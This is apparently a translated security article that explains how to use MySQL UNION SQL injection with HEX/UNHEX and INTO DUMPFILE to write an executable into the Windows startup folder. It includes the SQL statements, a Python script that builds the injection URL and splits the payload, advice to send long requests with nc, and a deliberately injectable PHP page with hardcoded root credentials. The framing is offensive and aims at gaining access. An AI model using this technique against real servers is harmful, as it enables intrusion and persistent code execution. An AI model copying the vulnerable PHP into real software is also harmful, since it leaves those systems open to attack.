Author: Sai52 [B.H.S.T]
Preface
In the article "Several Methods and Applications for Reading Files under MySQL" I mentioned that, in theory, a MySQL injection can be used to export an executable binary file into a startup item. The principle and an example are given here for reference.
The conditions for exporting files through MySQL injection are well known. To export an executable binary file there is one additional requirement: the injected field must be of a binary type (BLOB or LONGBLOB). Exporting an executable .bat file places no requirement on the field's data type. Any further restrictions depend on the environment.
If the injection page does not reveal the physical path of the web root, this method can still be used to gain access as long as the conditions above are met, because the file is written to a known startup path rather than to the web directory.
Implementation Principle
The executable file is encoded with HEX(), the encoded text is split into segments, and each segment is decoded back with UNHEX() (or written as an equivalent 0x literal) inside the injected query, so that INTO DUMPFILE writes the segments out in order and reassembles them into the complete file.
The details are as follows.
1. Columns of different data types can store data of the same encoding
In a MySQL database the column data type must match the encoding of the data stored in it. If the data stored in columns of different data types all uses the same encoding, then although the column types differ, the table holds data in only one encoding. A file can therefore be split into as many segments as the table has columns and stored across those columns; if the whole table is then exported to a single file in column order, the segments reassemble into a complete file in the original encoding. The output of HEX() is a plain string of the characters 0-9 and A-F, which string columns (CHAR, VARCHAR, TEXT, BLOB) accept directly; numeric and date columns only accept a segment that happens to parse as a valid value, so in practice the string columns carry the data. Each segment must stay within the storage range of the column that receives it.
2. Storage range of each data type
In an injection we normally use a UNION query and match the columns with numbers, in order to satisfy the rules of select_expression (the number of columns after UNION must equal the number selected by the first SELECT, and the column types must be compatible). A number is valid in almost every data type, so it matches any column. A HEX()-encoded string likewise fits almost every column type. We can therefore HEX()-encode the file, split the encoded text into as many segments as the table has columns, place each segment in the matching column position in order, build the injected URL, and export the complete file.
When splitting the HEX()-encoded file you need to know the storage range of each data type, so as to decide how long the segment for each field of the injection point may be and which encoding it must hold; the longest segment goes to the field with the largest storage range. See the MySQL data type introduction (http://www.sai52.com/archives/769).
3. Using different injection points, given the characteristics of UNION
MySQL can export a complete file under any file name as long as the data fits entirely into the corresponding column's data type. In other words, after the binary file is HEX()-encoded it can be stored in a non-binary column such as TEXT, and on export UNHEX() still yields a complete binary file. For example:
mysql> create table a (id int, cmd TEXT);
mysql> insert into a (id, cmd) values (1, hex(load_file('c:/windows/system32/regedt32.exe')));
mysql> select unhex(cmd) from a where id=1 into dumpfile 'd:/regedt32.exe';
In this statement unhex(cmd) turns the selected column into a binary string, so the complete binary file is exported. When the SELECT is reached through a UNION in the injection, the number of columns after UNION must equal that of the first SELECT and the column types must be compatible:
SELECT cmd FROM a WHERE id=1 AND 1=2 UNION SELECT unhex(cmd) FROM a
INTO DUMPFILE 'd:/regedt32.exe';
Here the unhex(cmd) column has a different type from the cmd column of the first SELECT. Binary data cannot be held completely in a TEXT column, so the complete binary file cannot be exported this way. To export a complete binary file, the columns selected by the first SELECT must be of a type that stores binary data, such as BLOB or LONGBLOB. This is not required when exporting a .bat file: any column type will do as long as the content fits.
4. Characteristics of INTO DUMPFILE
When INTO DUMPFILE is used to export data, MySQL writes only one row to the file, with no column or line terminators and no escaping. INTO DUMPFILE therefore joins the selected columns seamlessly: it can write a single column to a file, or a whole row of a table to a file.
UNHEX() is the inverse of HEX(): it interprets each pair of hexadecimal digits in its argument as a number and converts it to the byte with that value, returning the result as a binary string. A 0x... hexadecimal literal has the same meaning as UNHEX() applied to the same digits.
When the columns of the table (of whatever data types) hold the HEX-encoded file segments in sequence, a query of the form SELECT 0x<part1>, 0x<part2>, 0x<part3>, ..., 0x<partN> INTO DUMPFILE '<path>' writes them all out to a new file. The segments are decoded and placed in the file in column order, "seamlessly connected" into a file with the same encoding and size as the original, and saved wherever it is wanted, for example in the startup folder.
5. Restrictions on data submission with GET and POST
When the injection point takes its data via GET, the length of the URL is limited by the particular browser and server (note that the limit applies to the whole URL, not only to the length of your parameter values):
If the URL exceeds the browser's limit, the browser does not respond when the request is submitted.
If the URL exceeds the server's limit, the server does not process the request and returns an error such as "URL Too Long".
When submitting very long URLs by GET, use nc (netcat) or a dedicated data-submission tool rather than a browser.
Experiment shows that the server accepted GET parameters of up to about 16000 bytes (WIN2003 + IIS), so an executable binary of less than about 7.9 KB (HEX encoding doubles the size) can be exported this way. For POST injection points the maximum length of submitted data is determined by server settings, such as those in php.ini.
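The segmentation described in sections 1 to 4 and the GET length limit of section 5, as an added worked example in Python (not code from the original article): it takes a constructed stand-in for an executable, cuts it into one segment per column of the injected SELECT in column order, writes each segment as a 0x literal (or '' for an empty slot), builds the injected URL, reproduces what INTO DUMPFILE would write to confirm the segments reassemble into the original bytes, and computes the largest file that fits under a given URL limit. The column types mirror the eight-column test table of Instance 1, but the per-column byte budgets, the base URL and the startup-folder path are assumptions for illustration.

```python
from urllib.parse import quote

# Columns of the first SELECT in the injected query, in order, with an assumed
# byte budget for the segment each position may carry. The types mirror the
# eight-column test table of Instance 1; the budgets are illustrative
# assumptions (numeric and date positions get 0, string positions get a cap).
COLUMNS = [
    ("id", "INT", 0),
    ("b",  "BLOB", 65535),
    ("c",  "CHAR", 255),
    ("d",  "DATE", 0),
    ("lb", "LONGBLOB", 4294967295),
    ("t",  "TEXT", 65535),
    ("tm", "TIME", 0),
    ("v",  "VARCHAR", 255),
]

# Assumed target URL and startup-folder path (WIN2003 layout); adjust per target.
BASE_URL = "http://127.0.0.1/injection.php"
DUMP_PATH = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/x.exe"

# Constructed stand-in for an executable: an MZ header followed by 1 KiB of bytes.
SAMPLE_EXE = b"MZ\x90\x00" + bytes(range(256)) * 4


def split_file(data, columns):
    """Cut data into one segment per column, in column order (INTO DUMPFILE
    concatenates the selected columns in order), honouring each budget."""
    segments, pos = [], 0
    for _name, _type, budget in columns:
        take = min(budget, len(data) - pos)
        segments.append(data[pos:pos + take])
        pos += take
    if pos != len(data):
        raise ValueError("file is %d bytes but the columns hold only %d" % (len(data), pos))
    return segments


def hex_literal(segment):
    """0x... is a binary-string literal equivalent to UNHEX('...'); an empty
    segment is written as '' because a bare 0x is not valid SQL."""
    return "0x" + segment.hex().upper() if segment else "''"


def build_payload(data, columns, dump_path, id_value=1):
    """The value injected into id=: 'and 1=2' empties the first SELECT so the
    UNION yields exactly the one row that INTO DUMPFILE is allowed to write."""
    select_list = ",".join(hex_literal(s) for s in split_file(data, columns))
    return "%d and 1=2 UNION SELECT %s INTO DUMPFILE '%s'" % (id_value, select_list, dump_path)


def build_url(base_url, payload):
    # Spaces become %20; the SQL punctuation is left as-is (magic_quotes_gpc off).
    return base_url + "?id=" + quote(payload, safe="=',/:")


def simulate_dumpfile(payload):
    """Stand-in for the server: what INTO DUMPFILE writes for the payload, i.e.
    each literal decoded and concatenated with no terminators and no escaping."""
    select_list = payload.split("UNION SELECT ", 1)[1].split(" INTO DUMPFILE ")[0]
    out = bytearray()
    for literal in select_list.split(","):
        if literal != "''":
            out += bytes.fromhex(literal[2:])
    return bytes(out)


def max_file_size(base_url, columns, dump_path, url_limit=16000):
    """Largest file that fits under url_limit: every file byte costs two URL
    characters, and an empty slot ('') costs the same two characters as the
    0x prefix, so the URL for an empty payload is exactly the fixed overhead."""
    overhead = len(build_url(base_url, build_payload(b"", columns, dump_path)))
    return (url_limit - overhead) // 2


if __name__ == "__main__":
    payload = build_payload(SAMPLE_EXE, COLUMNS, DUMP_PATH)
    url = build_url(BASE_URL, payload)
    print("URL length %d, fits 16000-byte GET limit: %s" % (len(url), len(url) <= 16000))
    print("DUMPFILE output matches sample:", simulate_dumpfile(payload) == SAMPLE_EXE)
    print("largest file for this injection point: %d bytes" % max_file_size(BASE_URL, COLUMNS, DUMP_PATH))
```

simulate_dumpfile stands in for the MySQL server so the block runs offline; against a real target the URL would be sent with nc rather than a browser, as section 5 advises, and a file larger than max_file_size() has to go through a POST injection point instead.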
6. Effect of the default MySQL character set on double-byte characters in the export path
MySQL 5 provides several character set system variables. character_set_client is the character set in which MySQL interprets the data sent by the client.
A default MySQL installation uses latin1 (with the Swedish collation). When PHP connects to MySQL with default settings, whatever encoding the query is sent in, MySQL treats the transmitted data as latin1.
Double-byte text (Chinese, Japanese, Korean) submitted from a web page is, unless the server is configured otherwise, sent UTF-8 encoded (regardless of the encoding chosen at submission). MySQL reads it as latin1, so the double-byte text is inevitably garbled. When INTO OUTFILE or INTO DUMPFILE then writes to a path containing such text, the path is garbled too, and MySQL fails to export the file because the garbled path does not exist.
If the source of the injected PHP program contains a setting such as
mysql_query("set names utf8");
then the MySQL server reads client data as UTF-8, and during the injection the file can be exported to a directory whose name contains double-byte characters; otherwise MySQL fails to export the file because the garbled path cannot be found.
Figure 01
So, if the MySQL server uses UTF-8 encoding, or the PHP code that connects to MySQL contains a statement like
mysql_query("set names utf8");
then the file can be exported to a path containing double-byte characters; otherwise the export fails. If the export path contains no double-byte characters, there is no such restriction.
Instance 1: exporting an exe file to the startup folder (WIN2003 + IIS + PHP5 + MySQL5 set up on the local machine, magic_quotes_gpc = off)
PHP code: injection.php
<?php
// Deliberately injectable test page: $id is taken straight from the query
// string and concatenated into the SQL statement.
$mysql_server_name = "localhost";
$mysql_username    = "root";
$mysql_password    = "123456";
$mysql_database    = "injection";

$conn = mysql_connect($mysql_server_name, $mysql_username, $mysql_password);
mysql_select_db($mysql_database, $conn);
mysql_query("SET NAMES utf8");

$id  = $_GET['id'];
$sql = "select * from test where id=$id";   // injection point
$result = mysql_query($sql, $conn);
$row = mysql_fetch_row($result);

// The test table has eight columns; print one row per column with its data type and content.
$types = array("INT", "BLOB", "CHAR", "DATE", "LONGBLOB", "TEXT", "TIME", "VARCHAR");
echo "<table border=\"1\"><tbody>";
echo "<tr><td>data type</td><td>content</td></tr>";
foreach ($types as $i => $type) {
    echo "<tr><td>$type</td><td>" . $row[$i] . "</td></tr>";
}
echo "</tbody></table>";
?>